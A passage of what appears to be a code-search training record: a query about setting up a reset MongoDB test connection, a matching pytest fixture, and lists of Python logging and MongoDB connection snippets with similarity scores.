logging.DEBUG:\n http_client.HTTPConnection.debuglevel = 1\n else:\n http_client.HTTPConnection.debuglevel = 0\n\n zabbix_handler = logging.StreamHandler(sys.stdout)\n zabbix_handler.setFormatter(formatter)\n root_logger.addHandler(zabbix_handler)\n return root_logger", "def startlogging(self):\n loglevel = self.config['loglevel']\n logfilelevel = self.config['logfilelevel']\n # -v and -vv options only affect stdout logging\n loglevel = (loglevel, 'debug', 'all')[DEBUG] \n logging.basicConfig(level=self.loglevels[loglevel],\n format=self.config['logformat'],\n datefmt='%H:%M:%S')\n logging.addLevelName(5, 'ALL')\n # now define a logging handler for stdout\n logfile = logging.FileHandler('tangled.log')\n logfile.setLevel(self.loglevels[logfilelevel])\n formatter = logging.Formatter(self.config['logformat'], \n self.config['datefmt'])\n logfile.setFormatter(formatter)\n logging.getLogger('').addHandler(logfile)\n logging.info('New logging session at level {}'.format(loglevel))", "def _init_logging(verbosity=0, log_filename=None):\n\n root_logger = logging.getLogger()\n root_logger.handlers = []\n root_logger.addHandler(logging.NullHandler())\n\n sats_logger = logging.getLogger('sats')\n\n # Have the logger itself set with the lowest possible level\n sats_logger.setLevel(logging.DEBUG)\n # Reset any handlers that might have been set accidentally\n sats_logger.handlers = []\n\n # Always at least INFO in .flog\n file_level = logging.INFO\n\n if verbosity <= -2:\n stdout_level = logging.CRITICAL\n elif verbosity <= -1:\n stdout_level = logging.ERROR\n elif verbosity >= 1:\n stdout_level = logging.DEBUG\n file_level = logging.DEBUG\n else:\n stdout_level = logging.INFO\n\n # add the file handler only if a name is given\n if log_filename is not None:\n file_handler = logging.FileHandler(log_filename)\n file_handler.setLevel(file_level)\n formatter = logging.Formatter('[%(asctime)s] %(levelname)s '\n '<%(module)s.%(funcName)s> '\n '%(message)s',\n datefmt='%Y%m%d %H:%M:%S')\n file_handler.setFormatter(formatter)\n sats_logger.addHandler(file_handler)\n\n # Make these uniform widths\n logging.addLevelName(10, '--')\n logging.addLevelName(20, '>>')\n logging.addLevelName(30, '**')\n logging.addLevelName(40, '!!')\n logging.addLevelName(50, 'XX')\n\n # Use nice coloured console output\n console = ColouredConsoleHandler(stream=sys.stdout)\n console.setLevel(stdout_level)\n formatter = logging.Formatter('%(levelname)s %(message)s')\n console.setFormatter(formatter)\n # add the handler to the root logger\n sats_logger.addHandler(console)", "def _setup_cmd_logger():\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n formatter = ColoredFormatter('%(log_color)s[%(levelname)8s] %(message)s%(reset)s')\n ch.setLevel(level=logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)", "def init_logger():\n logpath = Path(f\"logs/{time.strftime('%Y.%m.%d %H:%M')}.txt\")\n logpath.parent.mkdir(exist_ok=True)\n logging.basicConfig(filename=logpath, level=logging.DEBUG)", "def __init__(self, default_level=logging.WARNING):\n # All loggers are an attr of self for tab completion in iPython\n # (with . replaced with _)\n self._loggerdict = logging.Logger.manager.loggerDict\n for name, logger in self._loggerdict.iteritems():\n attr = name.replace('.', '_')\n setattr(self, attr, logger)\n\n if len(logging.root.handlers) == 0:\n # The default level is INFO\n fmt='%(levelname)-7s | %(asctime)-23s | %(name)-8s | %(message)s'\n logging.basicConfig(format=fmt, level=default_level)\n logging.StreamHandler.emit = self._emit_wrap", "def _initialize_logging(self):\n LOG_CFG = os.environ.get('LOG_CFG', 'LOCAL')\n configure_logging(LOG_CFG)\n self.logger = logging.getLogger(self.__class__.__name__)", "def setup_logging():\n log_format = '%(asctime)-15s %(levelname)s: %(message)s'\n logging.basicConfig(format=log_format, level=logging.DEBUG,\n filename='counting_consumer.out')", "def setupLogging():\n global enabled, dummyInstance\n from pyemma.util.config import conf_values\n args = conf_values['Logging']\n\n if args.enabled:\n if args.tofile and args.file:\n filename = args.file\n else:\n filename = None\n try:\n logging.basicConfig(level=args.level,\n format=args.format,\n datefmt='%d-%m-%y %H:%M:%S',\n filename=filename,\n filemode='a')\n except IOError as ie:\n import warnings\n warnings.warn('logging could not be initialized, because of %s' % ie)\n return\n \"\"\" in case we want to log to both file and stream, add a separate handler\"\"\"\n if args.toconsole and args.tofile:\n ch = logging.StreamHandler()\n ch.setLevel(args.level)\n ch.setFormatter(logging.Formatter(args.format))\n logging.getLogger('').addHandler(ch)\n else:\n dummyInstance = dummyLogger()\n\n enabled = args.enabled", "def init_logger():\n lformat = \"%(asctime)s [%(levelname)-5.5s] [%(name)s] [%(threadName)-12.12s] %(message)s\"\n\n logging.basicConfig(\n level=logging.INFO,\n format=lformat,\n )\n\n file_handler = handlers.RotatingFileHandler(\n \"{0}/{1}.log\".format('.', 'meta-meta-hive'),\n maxBytes=(50*1024*1024),\n backupCount=7\n )\n file_handler.setFormatter(logging.Formatter(lformat))\n logging.getLogger().addHandler(file_handler)\n return", "def init_logging():\n global logger\n logging.basicConfig(\n format='%(levelname)s - %(message)s',\n )\n logger = logging.getLogger('runner')\n logger.setLevel(os.environ.get('LOGGING_LEVEL', 'INFO'))", "def configure_logging():\n dictConfig(DEFAULT_LOGGING)\n\n default_formatter = logging.Formatter(\n \"%(asctime)s [%(levelname)s] [PID:%(process)d TID:%(thread)d] [%(filename)s:%(lineno)s in `%(funcName)s`] %(message)s\",\n \"%Y-%m-%d %H:%M:%S\")\n\n # file_handler = logging.handlers.RotatingFileHandler(logfile_path, maxBytes=10485760,backupCount=300, encoding='utf-8')\n # file_handler.setLevel(logging.INFO)\n\n if len(logging.getLogger().handlers) > 0:\n for h in logging.getLogger().handlers:\n if isinstance(h, logging.StreamHandler):\n # Then we found a logger to the terminal\n h.setLevel(logging.DEBUG)\n h.setFormatter(default_formatter)\n\n else:\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(default_formatter)\n logging.root.addHandler(console_handler)\n\n\n logging.root.setLevel(logging.WARNING)", "def __init__(self):\n ## Creating the looger\n self.logger = logging.getLogger('iLiner_Logger')\n ## Setting the level for the logger\n self.logger.setLevel(logging.DEBUG)\n ## Creating the handler\n stdout_handler = logging.StreamHandler(sys.stdout)\n ## Creating the formatter\n formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\n stdout_handler.setFormatter(formatter)\n stdout_handler.setLevel(logging.DEBUG)\n self.logger.addHandler(stdout_handler)", "def setup_logger():\n formatter = ColoredFormatter(\n (\n '%(log_color)s%(levelname)-5s%(reset)s '\n '%(yellow)s[%(asctime)s]%(reset)s'\n '%(green)s %(name)s %(purple)s %(filename)s %(purple)s %(funcName)s %(purple)s:%(lineno)d%(reset)s '\n '%(bold_blue)s%(message)s%(reset)s'\n ),\n datefmt='%y-%m-%d %H;%M:%S',\n log_colors={\n 'DEBUG': 'blue',\n 'INFO': 'yellow',\n 'WARNING': 'red',\n 'ERROR': 'blue,bg_bold_red',\n 'CRITICAL': 'red,bg_white',\n }\n )\n\n logger = logging.getLogger('shen-yue-is-beautiful')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n\n return logger", "def startLogger(self):\n #------------------------------------------\n # Initialize logger\n log_level = getattr(logging, str(self.loglevel).upper())\n logging.basicConfig(filename=self.logfile,level=log_level, format=DEFAULT_LOG_FORMAT)\n logging.info(START_STRING)", "def init_logs():\n\n #Ensure that the directories are made\n make_dirs()\n\n #Create FileHandler logging handler, set it's log level, configure the log storage format,\n # and add the formatter to the root logger\n fh = logging.FileHandler(log_file)\n fh.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n logging.root.addHandler(fh)\n logging.root.setLevel(logging.INFO)\n\n #Report it to the world!\n logging.info(\"Saving logs to \" + log_file)", "def _configure_logging(self):\n self.log_level = Scaffold.LOG_LEVEL_MAP.get(self.log_level, ERROR)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n # assign the windmill instance logger\n #logging.basicConfig()\n self.log = logging.getLogger(self.name)\n self.log.setLevel(self.log_level)\n\n if self.log_path:\n file_path = None\n if self.log_path.endswith('.log'):\n file_path = self.log_path\n else:\n file_path = os.path.join(self.log_path, self.name + '.log')\n assert file_path\n file_handler = logging.FileHandler(file_path)\n file_handler.setLevel(self.log_level)\n file_handler.setFormatter(formatter)\n self.log.addHandler(file_handler)\n\n # if we are in verbose mode, then we send log output to console\n if self.verbose:\n # add the console logger for verbose mode\n console_handler = logging.StreamHandler()\n console_handler.setLevel(self.log_level)\n console_handler.setFormatter(formatter)\n self.log.addHandler(console_handler)\n\n self.log.info('Logging configured for: %s', self.name)", "def configure_logger (max_threads):\n\t\t# Hack for log line separator\n\t\twith open(\"pinger.log\", \"a\") as log:\n\t\t\tlog.write(\n\t\t\t\t\"==============================================================================================\\n\")\n\n\t\tlogging.basicConfig(filename=\"pinger.log\", level=logging.DEBUG, filemode='a',\n\t\t format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s', datefmt='%d.%m.%Y %H:%M:%S')\n\t\tlogging.info(\"Started with max threads: %d\", max_threads)", "def init():\n global logger\n\n with open(\"/app/log.json\", \"r\") as fd:\n logging.config.dictConfig(json.load(fd))\n\n logger = logging.getLogger()", "def setup_logging(log_dir=None, quiet=False):\n global _setup_done\n\n if _setup_done:\n return\n _setup_done = True\n\n _root.handlers = [] # Remove any handlers already attached\n _root.setLevel(\"DEBUG\")\n\n stream = StreamHandler()\n stream.setLevel(\"ERROR\" if quiet else \"DEBUG\")\n stream.setFormatter(_ColorFormatter())\n _root.addHandler(stream)\n\n if log_dir:\n _setup_file_logging(log_dir)\n\n if quiet:\n _disable_pywikibot_logging()", "def start(self):\n log.startLoggingWithObserver(self.emit, setStdout=0)", "def logger_settings(self):\n LOG_CONFIG['root']['handlers'].append(self.logmode)\n flask_log = logging.getLogger(DEFAULT_NAME_FLASK_LOGGER)\n flask_log.setLevel(logging.ERROR)\n dictConfig(LOG_CONFIG)\n self.logger = logging.getLogger()", "def setUp(self):\n self.logger = logging.getLogger(glutil.root_package_name)\n self.orig_handlers = self.logger.handlers\n self.logger.handlers = []\n self.level = self.logger.level\n self.logger.level = logging.DEBUG\n\n self.rt_logger = logging.getLogger()\n self.orig_root_handlers = self.rt_logger.handlers\n self.rt_logger.handlers = []\n self.root_level = self.rt_logger.level\n self.rt_logger.level = logging.CRITICAL", "def setup_logging(log_file):\n\tglobal logger\n\tif log_file:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',filename=log_file,filemode='w',level=logging.INFO)\n\telse:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',level=logging.INFO)\n\tlogger = logging.getLogger('default')", "def setup_logger():\n logger = logging.getLogger(\"extract_brass_bedpe\")\n LoggerFormat = '[%(levelname)s] [%(asctime)s] [%(name)s] - %(message)s'\n logger.setLevel(level=logging.INFO)\n handler = logging.StreamHandler(sys.stderr)\n formatter = logging.Formatter(LoggerFormat, datefmt='%Y%m%d %H:%M:%S')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return logger", "def setup_logger_console(log_level='info'):\n # Configureer threshold log level DEBUG voor de root logger (i.p.v. WARNING).\n setup_logger()\n\n # Configureer de console handler.\n console_handler = customize_handler(logging.StreamHandler(), log_level)\n # Koppel console handler aan de root logger.\n logging.getLogger('').addHandler(console_handler)\n\n return console_handler", "def init_log(log_level=logging.DEBUG):\n now = time.time()\n ts = datetime.datetime.fromtimestamp(now).strftime('%Y%m%d')\n file_name = os.path.abspath(os.path.join(os.getcwd(), '..', 'traffic_logs', f'{ts}_traffic.log'))\n folder, _ = os.path.split(file_name)\n Path(folder).mkdir(parents=True, exist_ok=True)\n\n # create formatter and add it to the handlers\n log_format = '[%(asctime)s][%(name)s][%(levelname)s] %(message)s'\n\n logging.basicConfig(filemode='a',\n format=log_format,\n datefmt='%H:%M:%S',\n level=logging.ERROR,\n stream=sys.stdout,\n # filename=file_handler\n )\n\n formatter = logging.Formatter(log_format)\n\n # create file handler which logs even debug messages\n file_handler = logging.FileHandler(file_name)\n file_handler.setFormatter(formatter)\n file_handler.setLevel(log_level)\n\n std_out = logging.StreamHandler(sys.stdout)\n std_out.setFormatter(formatter)\n std_out.setLevel(log_level)\n\n # This for avoiding streams to log to root's stderr, which prints in red in jupyter\n root_logger = logging.getLogger()\n for handler in root_logger.handlers:\n # continue\n root_logger.removeHandler(handler)\n\n # add the handlers to the logger\n root_logger.addHandler(file_handler)\n\n # By default the install() function installs a file_handler on the root root_logger,\n # this means that log messages from your code and log messages from the\n # libraries that you use will all show up on the terminal.\n coloredlogs.install(level=log_level, fmt=log_format, stream=sys.stdout)", "def setup_logging(log_level=logging.DEBUG):\n logging.basicConfig(level=log_level)\n fmt = \"%(asctime)s %(levelname)s (%(threadName)s) \" \"[%(name)s] %(message)s\"\n colorfmt = \"%(log_color)s{}%(reset)s\".format(fmt)\n datefmt = \"%Y-%m-%d %H:%M:%S\"\n\n try:\n from colorlog import ColoredFormatter\n\n logging.getLogger().handlers[0].setFormatter(\n ColoredFormatter(\n colorfmt,\n datefmt=datefmt,\n reset=True,\n log_colors={\n \"DEBUG\": \"cyan\",\n \"INFO\": \"green\",\n \"WARNING\": \"yellow\",\n \"ERROR\": \"red\",\n \"CRITICAL\": \"red\",\n },\n )\n )\n except ImportError:\n pass\n\n logger = logging.getLogger(\"\")\n logger.setLevel(log_level)" ]
[ "0.7975957", "0.7763486", "0.7686616", "0.75928164", "0.7581792", "0.7508208", "0.73854136", "0.73814046", "0.73402363", "0.7313796", "0.7308403", "0.73038954", "0.7274763", "0.7260364", "0.72556174", "0.7249487", "0.7241462", "0.72125137", "0.71615887", "0.71491545", "0.71091515", "0.7103326", "0.7095999", "0.709512", "0.7049582", "0.7035433", "0.70290786", "0.70194244", "0.7004849", "0.6997841", "0.6995546", "0.6927218", "0.68749934", "0.68704", "0.6854737", "0.6854089", "0.6841452", "0.68369216", "0.6830694", "0.67888016", "0.6780664", "0.6774768", "0.6771184", "0.6764732", "0.6753929", "0.6746233", "0.67414236", "0.6734909", "0.67338765", "0.6720437", "0.6709257", "0.6686435", "0.66845685", "0.6683992", "0.66833776", "0.66830623", "0.6682749", "0.6676036", "0.6655509", "0.6653659", "0.6651137", "0.665037", "0.6645409", "0.66347736", "0.66312695", "0.663053", "0.6628443", "0.6624574", "0.6621065", "0.66167253", "0.66118777", "0.6605791", "0.66054404", "0.65997785", "0.6591973", "0.65883154", "0.6587484", "0.6582215", "0.65716255", "0.6563003", "0.6555068", "0.6549678", "0.6549322", "0.6542105", "0.65340203", "0.6515089", "0.6505407", "0.6467465", "0.64670444", "0.6460377", "0.6452387", "0.6446658", "0.64435494", "0.6441619", "0.64402413", "0.64396524", "0.64386046", "0.64168006", "0.64114296", "0.64056885", "0.6397454" ]
0.0
-1
Set up a mongo connection reset and ready to roll.
def mongodb(request): from pp.user.model import db as mongo log = get_log('mongodb') db_name = "testingdb-{}".format(uuid.uuid4().hex) mongo.init(dict(db_name=db_name)) db = mongo.db() db.hard_reset() log.info('database ready for testing "{}"'.format(db_name)) def db_teardown(x=None): db.hard_reset() log.warn('teardown database for testing "{}"'.format(db_name)) request.addfinalizer(db_teardown) return db
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mongodb_init(cls, host=\"127.0.0.1\", port=27017, username=\"\", password=\"\", dbname=\"admin\"):\n if username and password:\n uri = \"mongodb://{username}:{password}@{host}:{port}/{dbname}\".format(username=quote_plus(username),\n password=quote_plus(password),\n host=quote_plus(host),\n port=port,\n dbname=dbname)\n else:\n uri = \"mongodb://{host}:{port}/{dbname}\".format(host=host, port=port, dbname=dbname)\n cls._mongo_client = motor.motor_asyncio.AsyncIOMotorClient(uri, connectTimeoutMS=5000, serverSelectionTimeoutMS=5000)\n #LoopRunTask.register(cls._check_connection, 2)\n SingleTask.call_later(cls._check_connection, 2) #模拟串行定时器,避免并发\n logger.info(\"create mongodb connection pool.\")", "def setUp(self):\n self.db_name = '_mongolog_test'\n self.collection_name = 'log'\n\n self.conn = pymongo.MongoClient()\n self.db = self.conn[self.db_name]\n self.collection = self.db[self.collection_name]\n\n #self.conn.drop_database(self.db_name)", "def connect(self):\n self.client = MongoClient(self.mongo_uri)\n self.db = self.client[self.db_name]", "def mongodb_init():\n # Load environment variables\n dotenv_path = find_dotenv()\n load_dotenv(dotenv_path)\n\n # Connect to the db\n # DB will be created if it doesn't already exist\n client = pymongo.MongoClient(os.environ.get(\"DATABASE_URL\"), 27017)\n # 'tweetbase' is the database name\n db = client.tweetbase\n\n #Sets both the tweet ID and user ID strings as unique indexes\n db.tweets.create_index([(\"id_str\", 1),\n (\"user.id_str\", 1)],\n unique=True)\n\n # The db is only actually created when something is inserted\n # So this inserts a test document and immediately deletes it...\n # AND EVERYTHING ELSE\n # DO NOT RUN THIS ON A DB YOU WANT TO KEEP. SERIOUSLY.\n db.tweets.insert_one({\"id_str\": 1, \"user\": {\"id_str\": 5}})\n db.tweets.remove()", "def connect_mongo():\n global MONGO_CLIENT\n\n with open('config.json') as config_file:\n config_data = json.load(config_file)\n\n MONGO_CLIENT = init_mongodb(config_data['mongo_host'],\n config_data['mongo_port'], keep_existing=True)", "def initState(currentState):\n\n global client , db \n\n print(\"<<INIT>>\")#DEBUG\n print(f\"mongodb+srv://{username}:{password}@cluster0.70rhn.mongodb.net/{dbname}?retryWrites=true&w=majority\")\n connected = False\n client = None\n while not connected:\n client = MongoClient(f\"mongodb+srv://{username}:{password}@cluster0.70rhn.mongodb.net/{dbname}?retryWrites=true&w=majority\")\n connected = not client == None\n db = client.texet\n return 'watch'", "def setup_method(self, method):\n\n connect('authserver-db-test', host='mongomock://localhost', alias='test')", "def Mongodb_Connection():\r\n \r\n client = pymongo.MongoClient(\"localhost\", 27017)\r\n db = client.test\r\n\r\n\r\n if db.Transaction.estimated_document_count() != 0:\r\n \"\"\"\r\n To make a new test, the database is cleared if not empty\r\n \"\"\"\r\n \r\n db.command(\"dropDatabase\")\r\n \r\n return db", "def setup_mongodb(app, host=None, port=None, pool_size=None,\n auto_start_request=None):\n app.add_config_var('mongodb/host', str, host)\n app.add_config_var('mongodb/port', int, port)\n app.add_config_var('mongodb/pool_size', int, pool_size)\n app.add_config_var('mongodb/auto_start_request', bool, auto_start_request)\n\n def _open_connection():\n \"\"\"Opens a new connection to a Mongo instance at host:port.\"\"\"\n host = app.conf['mongodb/host']\n port = app.conf['mongodb/port']\n pool_size = app.conf['mongodb/pool_size']\n auto_start_request = app.conf['mongodb/auto_start_request']\n\n try:\n db_connection = connection.Connection(\n host=host, port=port, pool_size=pool_size,\n auto_start_request=auto_start_request)\n except connection.ConnectionFailure:\n # Gets the values that are used to connect to Mongo server.\n if not host:\n _host = connection.Connection.HOST\n else:\n _host = host\n if not port:\n _port = connection.Connection.PORT\n else:\n _port = port\n\n print(\"Could not connect. Be sure that Mongo is running on %s:%d\" %\n (_host, _port))\n\n # 'local' is 1 per thread, 'app' might be shared between thread.\n # So if the connection object is thread safe (Pymongo does),\n # you can use 'app', otherwise you will need a connection per thread.\n #\n # local.mongodb_connection = db_connection\n app.mongodb_connection = db_connection\n\n app.connect_event('wsgi-call', _open_connection)", "def init_mongo_db():\n try:\n app.mongo.cx.server_info()\n app.mongo.db = app.mongo.cx[\"kamistudio\"]\n if \"kami_corpora\" not in app.mongo.db.collection_names():\n app.mongo.db.create_collection(\"kami_corpora\")\n app.mongo.db.kami_corpora.create_index(\"id\", unique=True)\n\n if \"kami_models\" not in app.mongo.db.collection_names():\n app.mongo.db.create_collection(\"kami_models\")\n app.mongo.db.kami_models.create_index(\"id\", unique=True)\n\n if \"kami_definitions\" not in app.mongo.db.collection_names():\n app.mongo.db.create_collection(\"kami_definitions\")\n app.mongo.db.kami_definitions.create_index(\"id\", unique=True)\n\n if \"kami_new_definitions\" not in app.mongo.db.collection_names():\n app.mongo.db.create_collection(\"kami_new_definitions\")\n\n except ServerSelectionTimeoutError as e:\n app.mongo.db = None", "def connection():\n from mongoengine import connect\n\n connect(host=\"mongomock://localhost\", alias=\"default\")", "def global_init(name='ramen2'):\n mongoengine.register_connection(alias=\"core\",name=name)", "def _connect(self, **kwargs):\n global _connection\n if self.reuse and _connection:\n self.connection = _connection\n else:\n if pymongo.version_tuple[0] < 3:\n try:\n self.connection = Connection(host=self.host,\n port=self.port, **kwargs)\n # pymongo >= 3.0 does not raise this error\n except PyMongoError:\n if self.fail_silently:\n return\n else:\n raise\n else:\n self.connection = Connection(host=self.host, port=self.port,\n **kwargs)\n try:\n self.connection.is_locked\n except ServerSelectionTimeoutError:\n if self.fail_silently:\n return\n else:\n raise\n _connection = self.connection\n\n self.db = self.connection[self.database_name]\n if self.username is not None and self.password is not None:\n auth_db = self.connection[self.authentication_database_name]\n self.authenticated = auth_db.authenticate(self.username,\n self.password)\n\n if self.capped:\n #\n # We don't want to override the capped collection\n # (and it throws an error anyway)\n try:\n self.collection = Collection(self.db, self.collection_name,\n capped=True, max=self.capped_max,\n size=self.capped_size)\n except OperationFailure:\n # Capped collection exists, so get it.\n self.collection = self.db[self.collection_name]\n else:\n self.collection = self.db[self.collection_name]", "def setUp(self):\n self.db_name = '_mongolog_test_dict'\n self.collection_name = 'log_test'\n\n self.configDict = {\n 'version': 1,\n 'handlers': {\n 'mongo': {\n 'class': 'mongolog.handlers.MongoHandler',\n 'db': self.db_name,\n 'collection': self.collection_name,\n 'level': 'INFO'\n }\n },\n 'root': {\n 'handlers': ['mongo'],\n 'level': 'INFO'\n }\n }\n\n self.conn = Connection('localhost')\n self.conn.drop_database(self.db_name)", "def init_db_command():\n init_client()\n click.echo('Initialized MongoClient.')", "def __init__(self):\n client = MongoClient(\n settings.MONGODB_SERVER,\n settings.MONGODB_PORT\n )\n db = client[settings.MONGODB_DB]\n self.collection = db[settings.MONGODB_COLLECTION]", "async def init_mongodb(app: web.Application) -> None:\n try:\n log.info(f'Initializing the MongoDB database Async & Sync Mongo DB')\n await asyncio.sleep(1)\n config = app['config']['mongodb']\n\n _url = await _construct_db_url(config)\n log.info(f'Mongo URL - {_url}')\n\n # Creating the Pymongo DB instance\n await _get_pymongo_instance(app, _url)\n\n # Creating the AsyncIOMotorClient DB instance\n await _get_asynciomotor_instance(app, _url)\n\n except Exception as e:\n log.error(f'init_mongodb {e}')\n raise e", "def tear_down_mongo(self):\r\n split_db = self.split_mongo.db\r\n # old_mongo doesn't give a db attr, but all of the dbs are the same\r\n split_db.drop_collection(self.old_mongo.collection)", "def __init__(self):\n self.client = MongoClient('localhost', 27017)#27017\n self.db = self.client.greency_db\n self.collection = self.db.inventory", "def __init__(self, db_name):\n uri = re.sub('<username>', mongoUser, connection_uri)\n uri = re.sub('<password>', mongoPassword, uri)\n self.client = pymongo.MongoClient(uri)\n # Create your database\n self.db = self.client[db_name]", "def setup_tap_mongodb(self):\n db_script = os.path.join(DIR, '..', '..', 'db', 'tap_mongodb.sh')\n self._run_command(db_script)", "def connection(request):\n\tconnection = pymongo.MongoClient('mongodb://localhost/test')\n\t\n\trequest.addfinalizer(partial(connection.drop_database, 'test'))\n\treturn connection", "async def connect():\n db.client = AsyncIOMotorClient(str(mongo_url),\n maxPoolSize=mongo_max_connections,\n minPoolSize=mongo_min_connections)\n \n print(f\"Connected to mongo at {mongo_url}\")", "def __enter__(self):\n self.connection = MongoClient(self.host, self.port)\n return self", "def reconnect(self):\n try:\n self.redis = Redis(self.servers, self.port, self.db)\n except Exception, e:\n print e", "def __init__(self, host=\"localhost\", port=27017):\n self._client = MongoClient(host, port)", "def init_app(self, app):\n super().init_app(app)\n\n info = uri_parser.parse_uri(app.settings['MONGODB_URI'])\n if not info['database']:\n raise ValueError('A database name must be specified.')\n app.settings['MONGODB_DATABASE'] = info['database']\n app.settings['MONGODB_USERNAME'] = info['username']\n app.settings['MONGODB_PASSWORD'] = info['password']\n\n app.settings['MONGODB_USE_SSL'] = info['options'].get('ssl', False)\n\n app.settings['MONGODB_AUTH_MECHANISM'] = info['options'].get(\n 'authmechanism', 'DEFAULT')\n\n # X.509\n app.settings['MONGODB_SSL_CERTFILE'] = info['options'].get(\n 'ssl_certfile')\n app.settings['MONGODB_SSL_CA_CERTS'] = info['options'].get(\n 'ssl_ca_certs')\n\n app.settings['MONGODB_REPLICA_SET'] = info['options'].get(\n 'replicaset')\n app.settings['MONGODB_MAX_POOL_SIZE'] = info['options'].get(\n 'max_pool_size')\n app.settings['MONGODB_CONNECT'] = info['options'].get(\n 'auto_start_request', False)\n\n # Keyword arguments that will be passed to the MongoDB client.\n kwargs = {\n 'host': app.settings['MONGODB_URI'],\n 'ssl': app.settings['MONGODB_USE_SSL'],\n 'document_class': app.settings['MONGODB_DOCUMENT_CLASS'],\n 'maxPoolSize': app.settings['MONGODB_MAX_POOL_SIZE'],\n 'tz_aware': app.settings['MONGODB_TIME_ZONE_AWARE'],\n 'connect': app.settings['MONGODB_CONNECT'],\n }\n\n if app.settings['MONGODB_REPLICA_SET']:\n kwargs['replicaSet'] = app.settings['MONGODB_REPLICA_SET']\n\n self._auth = {\n 'name': app.settings['MONGODB_USERNAME'],\n }\n if self._auth['name']:\n self._auth['mechanism'] = app.settings['MONGODB_AUTH_MECHANISM']\n if app.settings['MONGODB_AUTH_MECHANISM'] == 'MONGODB-X509':\n kwargs['ssl_cert_reqs'] = ssl.CERT_REQUIRED\n kwargs['ssl_certfile'] = app.settings['MONGODB_SSL_CERTFILE']\n kwargs['ssl_ca_certs'] = app.settings['MONGODB_SSL_CA_CERTS']\n\n if not (kwargs['ssl_certfile'] and kwargs['ssl_ca_certs']):\n raise ValueError(\n 'To use X.509, both the certificate file and the '\n 'certificate authority file must be specified.'\n )\n else:\n # Otherwise use username and password authentication.\n self._auth['password'] = app.settings['MONGODB_PASSWORD']\n\n if any(self._auth.values()) and not all(self._auth.values()):\n # Make sure that if any authentication settings are\n # provided, all authentication settings are provided. This\n # should only apply to username and password authentication.\n # NOTE: The pymongo URI parser will raise\n # pymongo.errors.InvalidURI if the username is empty.\n raise ValueError(\n 'Username and password must be specified together or '\n 'not at all.'\n )\n\n self.client = MongoClient(**kwargs)\n\n # If a database name was provided, store the name so that the\n # db property can be used.\n self._db = app.settings['MONGODB_DATABASE']", "def test_enchants():\n mongo = pymongo.MongoClient()\n populate_db(mongo.roguesim_python)", "def __init__(self,\n mongo_uri='',\n mongo_host='localhost',\n mongo_port=27017,\n mongo_user='',\n mongo_pass='',\n db_name='crits'):\n # If the user provided a URI, we will use that. Otherwise we will build\n # a URI from the other arguments.\n if mongo_uri != '':\n self.mongo_uri = mongo_uri\n else:\n # Build the authentication portion. Simple authentication only for\n # now.\n auth_str = ''\n if mongo_user != '':\n auth_str = mongo_user\n if mongo_pass != '' and mongo_user != '':\n auth_str = auth_str + ':' + mongo_pass\n if auth_str != '':\n auth_str = auth_str + '@'\n # Build the URI\n self.mongo_uri = 'mongodb://{}{}:{}'.format(auth_str, mongo_host,\n mongo_port)\n self.db_name = db_name\n self.client = None\n self.db = None", "def _reset(base: pymongo.database.Database) -> None:\n if base:\n for collection in base.list_collection_names():\n _reset_collection(base, collection)", "def connect_to_mongo(self, host_name=lab_hostname, mongo_port=real_mongo_port):\n try:\n self.mongo_client = pymongo.MongoClient(host_name, mongo_port)\n except Exception as e:\n print(\"Cannot connect to the Mongo Client at port {}. Error is {}\".format(mongo_port, e))", "def create_mongodb(config):\n\n \n mongo_url = \"mongodb://\"\n mongo_url += \",\".join(map(lambda srv: srv['host'] + \":\" + str(srv['port']), config['data']['mongoServers']))\n \n if 'replica' in config['data']:\n mongo_url += \"/?replicaSet={0}\".format(config['data']['replica'])\n\n client = MongoClient(mongo_url)\n\n return client", "async def connect_mongodb():\n logging.debug(\"Connecting to database client\")\n db.client = AsyncIOMotorClient(MONGODB_URI)", "def __init__(self):\n client = pymongo.MongoClient(os.getenv(\"MONGO_URI\"))\n if DEBUG or os.getenv(\"CI\"):\n self.db = client[os.getenv(\"TESTDB\")]\n else:\n self.db = client[os.getenv(\"DB\")]", "def open_db_connection():\n client = MongoClient() #'104.131.185.191', 27017\n db = client[\"225VOH\"]\n return client, db", "def test_relic():\n mongo_db = pymongo.MongoClient()\n init_db(mongo_db.roguesim_python)\n populate_db(mongo_db.roguesim_python)", "def _pre_setup(self):\r\n\r\n # Flush the Mongo modulestore\r\n ModuleStoreTestCase.drop_mongo_collections()\r\n\r\n # Call superclass implementation\r\n super(ModuleStoreTestCase, self)._pre_setup()", "def check_server_up(self):\n print \"Connecting to Mongo at %s:%s\" % (self.hostname, self.port)\n try:\n # TODO: update this to use new pymongo Client\n self.api = pymongo.Connection(self.hostname, self.port)\n return True\n except (AutoReconnect, ConnectionFailure), e:\n print e\n return False", "def _connect(self):\n try: \n self.r = redis.StrictRedis(host=self.host, port=self.port, db=self.db)\n except:\n raise", "def mongodb():\n DB.init(get_env('MONGODB_DATABASE_TEST'))\n yield DB\n DB.clean_data('tweets')", "def mongodb_drop():\n # Load environment variables\n dotenv_path = find_dotenv()\n load_dotenv(dotenv_path)\n # Connect to the db\n # DB will be created if it doesn't already exist\n client = pymongo.MongoClient(os.environ.get(\"DATABASE_URL\"), 27017)\n client = client.drop_database(\"tweetbase\")", "def setup_target_db(self):\n conn = MongoClient(host=self._target_host)\n conn['admin'].authenticate(self._user, self._password)\n return conn", "def test_passing_connection(self):\n Pet.init_db(Redis(host=REDIS_HOST, port=REDIS_PORT))\n self.assertIsNotNone(Pet.redis)", "def _connect(self):\n self.connection = RedisConnection(self.host, self.port, self.dbname)", "def mongo_connect(\n password,\n user='RCD2021',\n dbname='myFirstDatabase'\n):\n\n client = 